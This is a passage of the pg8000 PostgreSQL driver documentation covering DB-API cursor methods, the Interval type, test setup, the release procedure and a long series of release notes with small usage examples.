(an instance of `pg8000.dbapi.Connection`) on which the cursor was created.

This attribute is part of the
http://www.python.org/dev/peps/pep-0249/[DBAPI 2.0 specification].


===== pg8000.dbapi.Cursor.rowcount

This read-only attribute contains the number of rows that the last
`execute()` or `executemany()` method produced (for query statements like
`SELECT`) or affected (for modification statements like `UPDATE`).

The value is -1 if:

* No `execute()` or `executemany()` method has been performed yet on the
  cursor.
* There was no rowcount associated with the last `execute()`.
* At least one of the statements executed as part of an `executemany()` had no
  row count associated with it.
* Using a `SELECT` query statement on a PostgreSQL server older than version
  9.
* Using a `COPY` query statement on PostgreSQL server version 8.1 or older.

This attribute is part of the
http://www.python.org/dev/peps/pep-0249/[DBAPI 2.0 specification].


===== pg8000.dbapi.Cursor.description

This read-only attribute is a sequence of 7-item sequences. Each value contains
information describing one result column. The 7 items returned for each column
are (name, type_code, display_size, internal_size, precision, scale, null_ok).
Only the first two values are provided by the current implementation.

This attribute is part of the
http://www.python.org/dev/peps/pep-0249/[DBAPI 2.0 specification].


===== pg8000.dbapi.Cursor.close()

Closes the cursor.

This method is part of the
http://www.python.org/dev/peps/pep-0249/[DBAPI 2.0 specification].


===== pg8000.dbapi.Cursor.execute(operation, args=None, stream=None)

Executes a database operation. Parameters may be provided as a sequence, or as
a mapping, depending upon the value of `pg8000.dbapi.paramstyle`. Returns the
cursor, which may be iterated over.

This method is part of the
http://www.python.org/dev/peps/pep-0249/[DBAPI 2.0 specification].


operation::
  The SQL statement to execute.

args::
  If `pg8000.dbapi.paramstyle` is `qmark`, `numeric`, or `format`, this
  argument should be an array of parameters to bind into the statement. If
  `pg8000.dbapi.paramstyle` is `named`, the argument should be a `dict`
  mapping of parameters. If `pg8000.dbapi.paramstyle` is `pyformat`, the
  argument value may be either an array or a mapping.

stream::
  This is a pg8000 extension for use with the PostgreSQL
  http://www.postgresql.org/docs/current/static/sql-copy.html[COPY] command.
  For a `COPY FROM` the parameter must be a readable file-like object, and for
  `COPY TO` it must be writable.

New in version 1.9.11.


===== pg8000.dbapi.Cursor.executemany(operation, param_sets)

Prepare a database operation, and then execute it against all parameter
sequences or mappings provided.

This method is part of the
http://www.python.org/dev/peps/pep-0249/[DBAPI 2.0 specification].

operation::
  The SQL statement to execute.
param_sets::
  A sequence of parameters to execute the statement with. The values in the
  sequence should be sequences or mappings of parameters, the same as the args
  argument of the `pg8000.dbapi.Cursor.execute()` method.


===== pg8000.dbapi.Cursor.callproc(procname, parameters=None)

Call a stored database procedure with the given name and optional parameters.

This method is part of the
http://www.python.org/dev/peps/pep-0249/[DBAPI 2.0 specification].


procname::
  The name of the procedure to call.

parameters::
  A list of parameters.


===== pg8000.dbapi.Cursor.fetchall()

Fetches all remaining rows of a query result.

This method is part of the
http://www.python.org/dev/peps/pep-0249/[DBAPI 2.0 specification].

Returns: A sequence, each entry of which is a sequence of field values making
up a row.


===== pg8000.dbapi.Cursor.fetchmany(size=None)

Fetches the next set of rows of a query result.

This method is part of the
http://www.python.org/dev/peps/pep-0249/[DBAPI 2.0 specification].

size::
  The number of rows to fetch when called. If not provided, the
  `pg8000.dbapi.Cursor.arraysize` attribute value is used instead.

Returns: A sequence, each entry of which is a sequence of field values making
up a row. If no more rows are available, an empty sequence will be returned.


===== pg8000.dbapi.Cursor.fetchone()

Fetch the next row of a query result set.

This method is part of the
http://www.python.org/dev/peps/pep-0249/[DBAPI 2.0 specification].

Returns: A row as a sequence of field values, or `None` if no more rows are
available.


===== pg8000.dbapi.Cursor.setinputsizes(*sizes)

Used to set the parameter types of the next query. This is useful if it's
difficult for pg8000 to work out the types from the parameters themselves
(eg. for parameters of type None).

sizes::
  Positional parameters that are either the Python type of the parameter to be
  sent, or the PostgreSQL oid. Common oids are available as constants such as
  `pg8000.STRING`, `pg8000.INTEGER`, `pg8000.TIME` etc.

This method is part of the
http://www.python.org/dev/peps/pep-0249/[DBAPI 2.0 specification].


===== pg8000.dbapi.Cursor.setoutputsize(size, column=None)

This method is part of the
http://www.python.org/dev/peps/pep-0249/[DBAPI 2.0 specification], however, it
is not implemented by pg8000.
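As a quick sketch of the fetch methods working together (illustrative only,
reusing the `conn` connection from the examples above):

[source,python]
----
cur = conn.cursor()
cur.execute("SELECT generate_series(1, 5)")

first_two = cur.fetchmany(2)  # a sequence of the first two rows
third = cur.fetchone()        # the third row
rest = cur.fetchall()         # the remaining two rows
cur.close()

----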
==== pg8000.dbapi.Interval

An Interval represents a measurement of time. In PostgreSQL, an interval is
defined in the measure of months, days, and microseconds; as such, the pg8000
interval type represents the same information.

Note that values of the `pg8000.Interval.microseconds`, `pg8000.Interval.days`,
and `pg8000.Interval.months` properties are independently measured and cannot
be converted to each other. A month may be 28, 29, 30, or 31 days, and a day
may occasionally be lengthened slightly by a leap second.


===== pg8000.dbapi.Interval.microseconds

Measure of microseconds in the interval.

The microseconds value is constrained to fit into a signed 64-bit integer. Any
attempt to set a value too large or too small will result in an OverflowError
being raised.


===== pg8000.dbapi.Interval.days

Measure of days in the interval.

The days value is constrained to fit into a signed 32-bit integer. Any attempt
to set a value too large or too small will result in an OverflowError being
raised.


===== pg8000.dbapi.Interval.months

Measure of months in the interval.

The months value is constrained to fit into a signed 32-bit integer. Any
attempt to set a value too large or too small will result in an OverflowError
being raised.


== Tests

Install http://testrun.org/tox/latest/[tox]:

 pip install tox

Enable the PostgreSQL hstore extension by running the SQL command:

 create extension hstore;

and add a line to pg_hba.conf for the various authentication options:

....
host    pg8000_md5            all    127.0.0.1/32    md5
host    pg8000_gss            all    127.0.0.1/32    gss
host    pg8000_password       all    127.0.0.1/32    password
host    pg8000_scram_sha_256  all    127.0.0.1/32    scram-sha-256
host    all                   all    127.0.0.1/32    trust
....

then run `tox` from the `pg8000` directory:

`tox`

This will run the tests against the Python version of the virtual environment,
on the machine, and the installed PostgreSQL version listening on port 5432,
or the `PGPORT` environment variable if set.

Benchmarks are run as part of the test suite at `tests/test_benchmarks.py`.


== Doing A Release Of pg8000

Run `tox` to make sure all tests pass, then update the release notes, then do:

....
git tag -a x.y.z -m "version x.y.z"
rm -r build
rm -r dist
python setup.py sdist bdist_wheel --python-tag py3
for f in dist/*; do gpg --detach-sign -a $f; done
twine upload dist/*
....


== Release Notes

=== Version 1.19.1, 2021-04-03

* Fix bug where setinputsizes() was only used for the first parameter set of
  executemany().

* Support more PostgreSQL array types.


=== Version 1.19.0, 2021-03-28

* Network error exceptions are now wrapped in an `InterfaceError`, with the
  original exception as the cause. The error message for network errors always
  starts with the string `network error`.

* Upgraded to version 1.3.0 of Scramp, which has better error handling.


=== Version 1.18.0, 2021-03-06

* The `pg8000.dbapi.Cursor.callproc()` method is now implemented.

* SCRAM channel binding is now supported. That means SCRAM mechanisms ending in
  '-PLUS' such as SCRAM-SHA-256-PLUS are now supported when connecting to the
  server.

* A custom attribute `ssl.SSLContext.request_ssl` can be set to `False` to
  tell pg8000 to connect using an SSL socket, but to not request SSL from
  the PostgreSQL server. This is useful if you're connecting to a PostgreSQL
  server that's behind an SSL proxy.


=== Version 1.17.0, 2021-01-30

* The API is now split in two, pg8000.native and pg8000.dbapi.
  The legacy API still exists in this release, but will be removed in another
  release. The idea is that pg8000.dbapi can stick strictly to the DB-API 2
  specification, while pg8000.native can focus on usability without having to
  worry about compatibility with the DB-API standard.

* The column name in `Connection.description` used to be returned as a
  `bytes` but now it's returned as a `str`.

* Removed extra wrapper types PGJson, PGEnum etc. These were never properly
  documented and the problem they solve can be solved using CAST in the SQL or
  by using setinputsizes.


=== Version 1.16.6, 2020-10-10

* The column name in `Connection.description` used to be returned as a
  `bytes` but now it's returned as a `str`.

* Removed extra wrapper types PGJson, PGEnum etc. These were never properly
  documented and the problem they solve can be solved using CAST in the SQL or
  by using setinputsizes.


=== Version 1.16.5, 2020-08-07

* The TPC method `Connection.tpc_prepare()` was broken.


=== Version 1.16.4, 2020-08-03

* Include the `payload` in the tuples in `Connection.notifications`.
* More constants (eg. `DECIMAL` and `TEXT_ARRAY`) are now available for
  PostgreSQL types that are used in `setinputsizes()`.


=== Version 1.16.3, 2020-07-26

* If an unrecognized parameter is sent to `Cursor.setinputsizes()` use the
  `pg8000.UNKNOWN` type (705).
* When communicating with a PostgreSQL server with version < 8.2.0, `FETCH`
  commands don't have a row count.
* Include in the source distribution all necessary test files from the `test`
  directory.


=== Version 1.16.2, 2020-07-25

* Use the
  https://www.postgresql.org/docs/current/protocol-flow.html#id-1.10.5.7.4[simple query]
  cycle for queries that don't have parameters. This should give a performance
  improvement and also means that multiple statements can be executed in one
  go (as long as they don't have parameters), whereas previously `sqlparse`
  had to be used.


=== Version 1.16.1, 2020-07-18

* Enable the `Cursor.setinputsizes()` method. Previously this method didn't
  do anything. It's an optional method of the DBAPI 2.0 specification.


=== Version 1.16.0, 2020-07-11

* This is a backwardly incompatible release of pg8000.

* All data types are now sent as text rather than binary.

* Using adapters, custom types can be plugged in to pg8000.

* Previously, named prepared statements were used for all statements.
  Now unnamed prepared statements are used by default, and named prepared
  statements can be used explicitly by calling the Connection.prepare()
  method, which returns a PreparedStatement object.


=== Version 1.15.3, 2020-06-14

* For TCP connections (as opposed to Unix socket connections) the
  https://docs.python.org/3/library/socket.html#socket.create_connection[`socket.create_connection`]
  function is now used. This means pg8000 now works with IPv6 as well as IPv4.

* Better error messages for failed connections. A 'cause' exception is now
  added to the top-level pg8000 exception, and the error message contains the
  details of what was being connected to (host, port etc.).


=== Version 1.15.2, 2020-04-16

* Added a new method `run()` to the connection, which lets you run queries
  directly without using a `Cursor`. It always uses the `named` parameter
  style, and the parameters are provided using keyword arguments.
  There are now two sets of interactive examples, one using the pg8000
  extensions, and one using just DB-API features.

* Better error message if certain parameters in the `connect()` function are
  of the wrong type.

* The constructor of the `Connection` class now has the same signature as the
  `connect()` function, which makes it easier to use the `Connection` class
  directly if you want to.


=== Version 1.15.1, 2020-04-04

* Up to now the only supported way to create a new connection was to use the
  `connect()` function. However, some people are using the `Connection` class
  directly and this change makes it a bit easier to do that by making the
  class use a constructor which has the same signature as the `connect()`
  function.


=== Version 1.15.0, 2020-04-04

* Abandon the idea of arbitrary `init_params` in the connect() function. We
  now go back to having a fixed number of arguments. The argument
  `replication` has been added as this is the only extra init param that was
  needed. The reason for going back to a fixed number of arguments is that
  you get better feedback if you accidentally mistype a parameter name.

* The `max_prepared_statements` parameter has been moved from being a module
  property to being an argument of the connect() function.


=== Version 1.14.1, 2020-03-23

* Ignore any `init_params` that have a value of `None`. This seems to be more
  useful and the behaviour is more expected.


=== Version 1.14.0, 2020-03-21

* Tests are now included in the source distribution.

* Any extra keyword parameters of the `connect()` function are sent as
  initialization parameters when the PostgreSQL session starts. See the API
  docs for more information. Thanks to Patrick Hayes for suggesting this.

* The ssl.wrap_socket function is deprecated, so we now give the user the
  option of using a default `SSLContext` or to pass in a custom one. This is a
  backwardly incompatible change. See the API docs for more info. Thanks to
  Jonathan Ross Rogers <jrogers@emphasys-software.com> for his work on this.

* Oversized integers are now returned as a `Decimal` type, whereas before a
  `None` was returned. Thanks to Igor Kaplounenko <igor.kaplounenko@intel.com>
  for his work on this.

* Allow setting of connection source address in the `connect()` function. See
  the API docs for more details. Thanks to David King
  <davidking@davids-mbp.home> for his work on this.


=== Version 1.13.2, 2019-06-30

* Use the https://pypi.org/project/scramp/[Scramp] library for the SCRAM
  implementation.

* Fixed bug where SQL such as `make_interval(days := 10)` failed on the `:=`
  part. Thanks to https://github.com/sanepal[sanepal] for reporting this.


=== Version 1.13.1, 2019-02-06

* We weren't correctly uploading releases to PyPI, which led to confusion
  when dropping Python 2 compatibility. Thanks to
  https://github.com/piroux[Pierre Roux] for his
  https://github.com/tlocke/pg8000/issues/7[detailed explanation] of what
  went wrong and how to correct it.

* Fixed bug where references to the `six` library were still in the code, even
  though we don't use `six` anymore.


=== Version 1.13.0, 2019-02-01

* Remove support for Python 2.

* Support the scram-sha-256 authentication protocol.
=== Version 1.12.4, 2019-01-05\n\n* Support the PostgreSQL cast operator `::` in SQL statements.\n\n* Added support for more advanced SSL options. See docs on `connect` function\n for more details.\n\n* TCP keepalives enabled by default, can be set in the `connect` function.\n\n* Fixed bug in array dimension calculation.\n\n* Can now use the `with` keyword with connection objects.\n\n\n=== Version 1.12.3, 2018-08-22\n\n* Make PGVarchar and PGText inherit from `str`. Simpler than inheriting from\n a PGType.\n\n\n=== Version 1.12.2, 2018-06-28\n\n* Add PGVarchar and PGText wrapper types. This allows fine control over the\n string type that is sent to PostgreSQL by pg8000.\n\n\n=== Version 1.12.1, 2018-06-12\n\n\n* Revert back to the Python 3 `str` type being sent as an `unknown` type,\n rather than the `text` type as it was in the previous release. The reason is\n that with the `unknown` type there's the convenience of using a plain Python\n string for JSON, Enum etc. There's always the option of using the\n `pg8000.PGJson` and `pg8000.PGEnum` wrappers if precise control over the\n PostgreSQL type is needed.\n\n\n=== Version 1.12.0, 2018-06-12\n\nNote that this version is not backward compatible with previous versions.\n\n* The Python 3 `str` type was sent as an `unknown` type, but now it's sent as\n the nearest PostgreSQL type `text`.\n\n* pg8000 now recognizes that inline SQL comments end with a newline.\n\n* Single `%` characters now allowed in SQL comments.\n\n* The wrappers `pg8000.PGJson`, `pg8000.PGJsonb` and `pg8000.PGTsvector` can\n now be used to contain Python values to be used as parameters. The wrapper\n `pg8000.PGEnum` can be used for Python 2, which doesn't have a standard\n `enum.Enum` type.\n\n\n=== Version 1.11.0, 2017-08-16\n\nNote that this version is not backward compatible with previous versions.\n\n* The Python `int` type was sent as an `unknown` type, but now it's sent as the\n nearest matching PostgreSQL type. Thanks to Patrick Hayes.\n\n* Prepared statements are now closed on the server when pg8000 clears them from\n its cache.\n\n* Previously a `%` within an SQL literal had to be escaped, but this is no\n longer the case.\n\n* Notifications, notices and parameter statuses are now handled by simple\n `deque` buffers. See docs for more details; a sketch follows at the end of\n this entry.\n\n* Connections and cursors are no longer threadsafe. So to be clear, neither\n connections nor cursors should be shared between threads. One thread per\n connection is mandatory now. This has been done for performance reasons, and\n to simplify the code.\n\n* Rather than reading results from the server in batches, pg8000 now always\n downloads them in one go. This avoids `portal closed` errors and makes things\n a bit quicker, but now one has to avoid downloading too many rows in a single\n query.\n\n* Attempts to return something informative if the returned PostgreSQL timestamp\n value is outside the range of the Python datetime.\n\n* Allow empty arrays as parameters, assume they're of string type.\n\n* The cursor now has a context manager, so it can be used with the `with`\n keyword. Thanks to Ildar Musin.\n\n* Add support for `application_name` parameter when connecting to database,\n issue https:\/\/github.com\/mfenniak\/pg8000\/pull\/106[#106]. Thanks to\n https:\/\/github.com\/vadv[@vadv] for the contribution.\n\n* Fix warnings from PostgreSQL \"not in a transaction\", when calling\n ``.rollback()`` while not in a transaction, issue\n https:\/\/github.com\/mfenniak\/pg8000\/issues\/113[#113]. Thanks to\n https:\/\/github.com\/jamadden[@jamadden] for the contribution.\n\n* Errors from the server are now always passed through in full.\n
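A sketch of the notification buffer mentioned above (the channel name and\n connection details are illustrative; the exact shape of each entry has varied\n between releases -- see 1.16.4 above, which added the payload):\n\n[source,python]\n----\nimport pg8000\n\ncon = pg8000.connect(user=\"postgres\", password=\"secret\")\ncur = con.cursor()\ncur.execute(\"LISTEN demo_channel\")\ncur.execute(\"NOTIFY demo_channel\")\ncon.commit()\n\n# A further round trip gives pg8000 a chance to read the async message.\ncur.execute(\"SELECT 1\")\n\n# Notifications accumulate in a simple collections.deque on the connection.\nfor notification in con.notifications:\n    print(notification)\n\ncon.close()\n----\n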
=== Version 1.10.6, 2016-06-10\n\n* Fixed a problem where we weren't handling the password connection parameter\n correctly. Now it's handled in the same way as the 'user' and 'database'\n parameters, ie. if the password is bytes, then pass it straight through to the\n database, if it's a string then encode it with utf8.\n\n* It used to be that if the 'user' parameter to the connection function was\n 'None', then pg8000 would try and look at environment variables to find a\n username. Now we just go by the 'user' parameter only, and give an error if\n it's None.\n\n\n=== Version 1.10.5, 2016-03-04\n\n* Include LICENCE text and sources for docs in the source distribution (the\n tarball).\n\n\n=== Version 1.10.4, 2016-02-27\n\n* Fixed bug where if a str is sent as a query parameter, and then with the same\n cursor an int is sent instead of a string, for the same query, then it fails.\n\n* Under Python 2, a str type is now sent 'as is', ie. as a byte string rather\n than trying to decode and send according to the client encoding. Under Python\n 2 it's recommended to send text as unicode() objects.\n\n* Dropped and added support for Python versions. Now pg8000 supports\n Python 2.7+ and Python 3.3+.\n\n* Dropped and added support for PostgreSQL versions. Now pg8000 supports\n PostgreSQL 9.1+.\n\n* pg8000 uses the 'six' library for making the same code run on both Python 2\n and Python 3. We used to include it as a file in the pg8000 source code. Now\n we have it as a separate dependency that's installed with 'pip install'. The\n reason for doing this is that package maintainers for OS distributions\n prefer unbundled libraries.\n\n\n=== Version 1.10.3, 2016-01-07\n\n* Removed testing for PostgreSQL 9.0 as it's no longer supported by the\n PostgreSQL Global Development Group.\n* Fixed bug where pg8000 would fail with datetimes if PostgreSQL was compiled\n with the integer_datetimes option set to 'off'. The bug was in the\n timestamp_send_float function.\n\n\n=== Version 1.10.2, 2015-03-17\n\n* If there's a socket exception thrown when communicating with the database,\n it is now wrapped in an OperationalError exception, to conform to the DB-API\n spec.\n\n* Previously, pg8000 didn't recognize the EmptyQueryResponse (that the server\n sends back if the SQL query is an empty string); now we raise a\n ProgrammingError exception.\n\n* Added socket timeout option for Python 3.\n\n* If the server returns an error, we used to initialize the ProgrammingError\n with just the first three fields of the error. Now we initialize the\n ProgrammingError with all the fields.\n\n* Use relative imports inside package.\n\n* User and database names given as bytes. The user and database parameters of\n the connect() function are now passed directly as bytes to the server. If the\n type of the parameter is unicode, pg8000 converts it to bytes using the utf8\n encoding.\n\n* Added support for JSON and JSONB Postgres types. We take the approach of\n taking serialized JSON (str) as an SQL parameter, but returning results as\n de-serialized JSON (Python objects). See the example in the Quickstart; a\n sketch also follows at the end of this entry.\n\n* Added CircleCI continuous integration.\n\n* String support in arrays now allows letters like \"u\", braces and whitespace.\n
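A sketch of the JSON round trip described above (connection details are\n illustrative, and the DB-API spelling shown is today's):\n\n[source,python]\n----\nimport json\n\nimport pg8000\n\ncon = pg8000.connect(user=\"postgres\", password=\"secret\")\ncur = con.cursor()\n\n# Serialized JSON (a str) goes in as the SQL parameter...\ncur.execute(\"SELECT CAST(%s AS json)\", (json.dumps({\"a\": [1, 2]}),))\n\n# ...and the result comes back de-serialized, as Python objects.\nprint(cur.fetchone()[0])  # {'a': [1, 2]}\n\ncon.close()\n----\n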
=== Version 1.10.1, 2014-09-15\n\n* Add support for the Wheel package format.\n\n* Remove option to set a connection timeout. For communicating with the server,\n pg8000 uses a file-like object using socket.makefile() but you can't use this\n if the underlying socket has a timeout.\n\n\n=== Version 1.10.0, 2014-08-30\n\n* Remove the old ``pg8000.dbapi`` and ``pg8000.DBAPI`` namespaces. For example,\n now only ``pg8000.connect()`` will work, and ``pg8000.dbapi.connect()``\n won't work any more.\n\n* Parse server version string with LooseVersion. This should solve the problems\n that people have been having when using versions of PostgreSQL such as\n ``9.4beta2``.\n\n* Message if portal suspended in autocommit. Give a proper error message if the\n portal is suspended while in autocommit mode. The error is that the portal is\n closed when the transaction is closed, and so in autocommit mode the portal\n will be immediately closed. The bottom line is, don't use autocommit mode if\n there's a chance of retrieving more rows than the cache holds (currently 100).\n\n\n=== Version 1.9.14, 2014-08-02\n\n* Make ``executemany()`` set ``rowcount``. Previously, ``executemany()`` would\n always set ``rowcount`` to -1. Now we set it to a meaningful value if\n possible. If any of the statements have a -1 ``rowcount`` then the\n ``rowcount`` for the ``executemany()`` is -1, otherwise the ``executemany()``\n ``rowcount`` is the sum of the rowcounts of the individual statements.\n\n* Support for password authentication. pg8000 didn't support plain text\n authentication, now it does.\n\n\n=== Version 1.9.13, 2014-07-27\n\n* Reverted to using the string ``connection is closed`` as the message of the\n exception that's thrown if a connection is closed. For a few versions we were\n using a slightly different one with capitalization and punctuation, but we've\n reverted to the original because it's easier for users of the library to\n consume.\n\n* Previously, ``tpc_recover()`` would start a transaction if one was not already\n in progress. Now it won't.\n\n\n=== Version 1.9.12, 2014-07-22\n\n* Fixed bug in ``tpc_commit()`` where a single phase commit failed.\n\n\n=== Version 1.9.11, 2014-07-20\n\n* Add support for two-phase commit DBAPI extension. Thanks to Mariano Reingart's\n TPC code on the Google Code version:\n\n https:\/\/code.google.com\/p\/pg8000\/source\/detail?r=c8609701b348b1812c418e2c7\n\n on which the code for this commit is based.\n\n* Deprecate ``copy_from()`` and ``copy_to()``. The methods ``copy_from()`` and\n ``copy_to()`` of the ``Cursor`` object are deprecated because it's simpler and\n more flexible to use the ``execute()`` method with a ``fileobj`` parameter. A\n sketch follows at the end of this entry.\n\n* Fixed bug in reporting unsupported authentication codes. Thanks to\n https:\/\/github.com\/hackgnar for reporting this and providing the fix.\n\n* Have a default for the ``user`` parameter of the ``connect()`` function. If\n the ``user`` parameter of the ``connect()`` function isn't provided, look\n first for the ``PGUSER`` then the ``USER`` environment variables. Thanks to\n Alex Gaynor https:\/\/github.com\/alex for this suggestion.\n\n* Before PostgreSQL 8.2, ``COPY`` didn't give row count. Until PostgreSQL 8.2\n (which includes Amazon Redshift which forked at 8.0) the ``COPY`` command\n didn't return a row count, but pg8000 thought it did. That's fixed now.\n
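A sketch of the replacement idiom for the deprecated copy methods (the table\n and connection details are illustrative; note that the keyword for the\n file-like object is spelled `stream` in later releases):\n\n[source,python]\n----\nimport io\n\nimport pg8000\n\ncon = pg8000.connect(user=\"postgres\", password=\"secret\")\ncur = con.cursor()\n\n# COPY through execute(), passing the file-like object as a keyword argument.\ndata = io.BytesIO(b\"1\\talpha\\n2\\tbeta\\n\")\ncur.execute(\"COPY demo FROM STDIN\", stream=data)\ncon.commit()\n\ncon.close()\n----\n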
=== Version 1.9.10, 2014-06-08\n\n* Remember prepared statements. Now prepared statements are never closed, and\n pg8000 remembers which ones are on the server, and uses them when a query is\n repeated. This gives an increase in performance, because on subsequent\n queries the prepared statement doesn't need to be created each time.\n\n* For performance reasons, pg8000 never closed portals explicitly, it just\n let the server close them at the end of the transaction. However, this can\n cause memory problems for long running transactions, so now pg8000 always\n closes a portal after it's exhausted.\n\n* Fixed bug where unicode arrays failed under Python 2. Thanks to\n https:\/\/github.com\/jdkx for reporting this.\n\n* A FLUSH message is now sent after every message (except SYNC). This is in\n accordance with the protocol docs, and ensures the server sends back its\n responses straight away.\n\n\n=== Version 1.9.9, 2014-05-12\n\n* The PostgreSQL interval type is now mapped to datetime.timedelta where\n possible. Previously the PostgreSQL interval type was always mapped to the\n pg8000.Interval type. However, to support the datetime.timedelta type we\n now use it whenever possible. Unfortunately it's not always possible because\n timedelta doesn't support months. If months are needed then the fall-back\n is the pg8000.Interval type. This approach means we handle timedelta in a\n similar way to other Python PostgreSQL drivers, and it makes pg8000\n compatible with popular ORMs like SQLAlchemy.\n\n* Fixed bug in executemany() where a new prepared statement should be created\n for each variation in the oids of the parameter sets.\n\n\n=== Version 1.9.8, 2014-05-05\n\n* We used to ask the server for a description of the statement, and then ask\n for a description of each subsequent portal. We now only ask for a\n description of the statement. This results in a significant performance\n improvement, especially for executemany() calls and when using the\n 'use_cache' option of the connect() function.\n\n* Fixed warning in Python 3.4 which was saying that a socket hadn't been\n closed. It seems that closing a socket file doesn't close the underlying\n socket.\n\n* Now should cope with PostgreSQL 8 versions before 8.4. This includes Amazon\n Redshift.\n\n* Added 'unicode' alias for 'utf-8', which is needed for Amazon Redshift.\n\n* Various other bug fixes.\n\n\n=== Version 1.9.7, 2014-03-26\n\n* Caching of prepared statements. There's now a 'use_cache' boolean parameter\n for the connect() function, which causes all prepared statements to be cached\n by pg8000, keyed on the SQL query string. This should speed things up\n significantly in most cases.\n\n* Added support for the PostgreSQL inet type. It maps to the Python types\n IPv*Address and IPv*Network.\n\n* Added support for PostgreSQL +\/- infinity date and timestamp values. Now the\n Python value datetime.datetime.max maps to the PostgreSQL value 'infinity'\n and datetime.datetime.min maps to '-infinity', and the same for\n datetime.date.\n\n* Added support for the PostgreSQL types int2vector and xid, which are mostly\n used internally by PostgreSQL.\n\n\n=== Version 1.9.6, 2014-02-26\n\n* Fixed a bug where 'portal does not exist' errors were being generated. Some\n queries that should have been run in a transaction were run in autocommit\n mode and so any that suspended a portal had the portal immediately closed,\n because a portal can only exist within a transaction. This has been solved by\n determining the transaction status from the READY_FOR_QUERY message.\n
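For reference, a toy illustration of the message involved (this is not\n pg8000's actual code): the backend's ReadyForQuery message carries a single\n status byte -- 'I' (idle), 'T' (in transaction) or 'E' (failed transaction).\n\n[source,python]\n----\n# Toy decoder for the ReadyForQuery status byte (illustrative only).\nSTATUSES = {\n    b\"I\": \"idle\",\n    b\"T\": \"in transaction\",\n    b\"E\": \"in failed transaction\",\n}\n\n\ndef transaction_status(ready_for_query_body: bytes) -> str:\n    return STATUSES[ready_for_query_body[:1]]\n\n\nprint(transaction_status(b\"T\"))  # in transaction\n----\n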
=== Version 1.9.5, 2014-02-15\n\n* Removed warn() calls for __next__() and __iter__(). Removing the warn() in\n __next__() improves the performance tests by ~20%.\n\n* Increased performance of timestamp by ~20%. Should also improve timestamptz.\n\n* Moved statement_number and portal_number from module to Connection. This\n should reduce lock contention for cases where there's a single module and\n lots of connections.\n\n* Make decimal_out\/in and time_in use client_encoding. These functions used to\n assume ascii, and I can't think of a case where that wouldn't work.\n Nonetheless, that theoretical bug is now fixed.\n\n* Fixed a bug in cursor.executemany(), where a non-None parameter in one\n sequence of parameters is None in a subsequent sequence of parameters.\n\n\n=== Version 1.9.4, 2014-01-18\n\n* Fixed a bug where with Python 2, a parameter with the value Decimal('12.44')\n (and probably other numbers) isn't sent correctly to PostgreSQL, and so the\n command fails. This has been fixed by sending decimal types as text rather\n than binary. I'd imagine it's slightly faster too.\n\n\n=== Version 1.9.3, 2014-01-16\n\n* Fixed bug where there were missing trailing zeros after the decimal point in\n the NUMERIC type. For example, the NUMERIC value 1.0 was returned as 1 (with\n no zero after the decimal point).\n\n This is fixed by making pg8000 use the text rather than binary\n representation for the numeric type. This actually doubles the speed of\n numeric queries.\n\n\n=== Version 1.9.2, 2013-12-17\n\n* Fixed incompatibility with PostgreSQL 8.4. In 8.4, the CommandComplete\n message doesn't return a row count if the command is SELECT. We now look at\n the server version and don't look for a row count for a SELECT with version\n 8.4.\n\n\n=== Version 1.9.1, 2013-12-15\n\n* Fixed bug where the Python 2 'unicode' type wasn't recognized in a query\n parameter.\n\n\n=== Version 1.9.0, 2013-12-01\n\n* For Python 3, the :class:`bytes` type replaces the :class:`pg8000.Bytea`\n type. For backward compatibility the :class:`pg8000.Bytea` still works under\n Python 3, but its use is deprecated.\n\n* A single codebase for Python 2 and 3.\n\n* Everything (functions, properties, classes) is now available under the\n ``pg8000`` namespace. So for example:\n\n * pg8000.DBAPI.connect() -> pg8000.connect()\n * pg8000.DBAPI.apilevel -> pg8000.apilevel\n * pg8000.DBAPI.threadsafety -> pg8000.threadsafety\n * pg8000.DBAPI.paramstyle -> pg8000.paramstyle\n * pg8000.types.Bytea -> pg8000.Bytea\n * pg8000.types.Interval -> pg8000.Interval\n * pg8000.errors.Warning -> pg8000.Warning\n * pg8000.errors.Error -> pg8000.Error\n * pg8000.errors.InterfaceError -> pg8000.InterfaceError\n * pg8000.errors.DatabaseError -> pg8000.DatabaseError\n\n The old locations are deprecated, but still work for backward compatibility.\n\n* Lots of performance improvements.\n\n * Faster receiving of ``numeric`` types.\n * Query only parsed when PreparedStatement is created.\n * PreparedStatement re-used in executemany()\n * Use ``collections.deque`` rather than ``list`` for the row cache. We're\n adding to one end and removing from the other. 
This is O(n) for a list but\n O(1) for a deque.\n * Find the conversion function and do the format code check in the\n ROW_DESCRIPTION handler, rather than every time in the ROW_DATA handler.\n * Use the 'unpack_from' form of struct, when unpacking the data row, so we\n don't have to slice the data.\n * Return row as a list for better performance. At the moment result rows are\n turned into a tuple before being returned. Returning the rows directly as a\n list speeds up the performance tests about 5%.\n * Simplify the event loop. Now the main event loop just continues until a\n READY_FOR_QUERY message is received. This follows the suggestion in the\n Postgres protocol docs. There's not much of a difference in speed, but the\n code is a bit simpler, and it should make things more robust.\n * Re-arrange the code as a state machine to give > 30% speedup.\n * Using pre-compiled struct objects. Pre-compiled struct objects are a bit\n faster than using the struct functions directly. It also hopefully adds to\n the readability of the code.\n * Speeded up _send. Before calling the socket 'write' method, we were\n checking that the 'data' type implements the 'buffer' interface (bytes or\n bytearray), but the check isn't needed because 'write' raises an exception\n if data is of the wrong type.\n\n\n* Add facility for turning auto-commit on. This follows the suggestion of\n funkybob to fix the problem of not being able to execute a command such as\n 'create database' that must be executed outside a transaction. Now you can do\n conn.autocommit = True and then execute 'create database'.\n\n* Add support for the PostgreSQL ``uid`` type. Thanks to Rad Cirskis.\n\n* Add support for the PostgreSQL XML type.\n\n* Add support for the PostgreSQL ``enum`` user defined types.\n\n* Fix a socket leak, where a problem opening a connection could leave a socket\n open.\n\n* Fix empty array issue. https:\/\/github.com\/mfenniak\/pg8000\/issues\/10\n\n* Fix scale on ``numeric`` types. https:\/\/github.com\/mfenniak\/pg8000\/pull\/13\n\n* Fix numeric_send. Thanks to Christian Hofstaedtler.\n\n\n=== Version 1.08, 2010-06-08\n\n* Removed usage of deprecated :mod:`md5` module, replaced with :mod:`hashlib`.\n Thanks to Gavin Sherry for the patch.\n\n* Start transactions on execute or executemany, rather than immediately at the\n end of previous transaction. Thanks to Ben Moran for the patch.\n\n* Add encoding lookups where needed, to address usage of SQL_ASCII encoding.\n Thanks to Benjamin Schweizer for the patch.\n\n* Remove record type cache SQL query on every new pg8000 connection.\n\n* Fix and test SSL connections.\n\n* Handle out-of-band messages during authentication.\n\n\n=== Version 1.07, 2009-01-06\n\n* Added support for :meth:`~pg8000.dbapi.CursorWrapper.copy_to` and\n 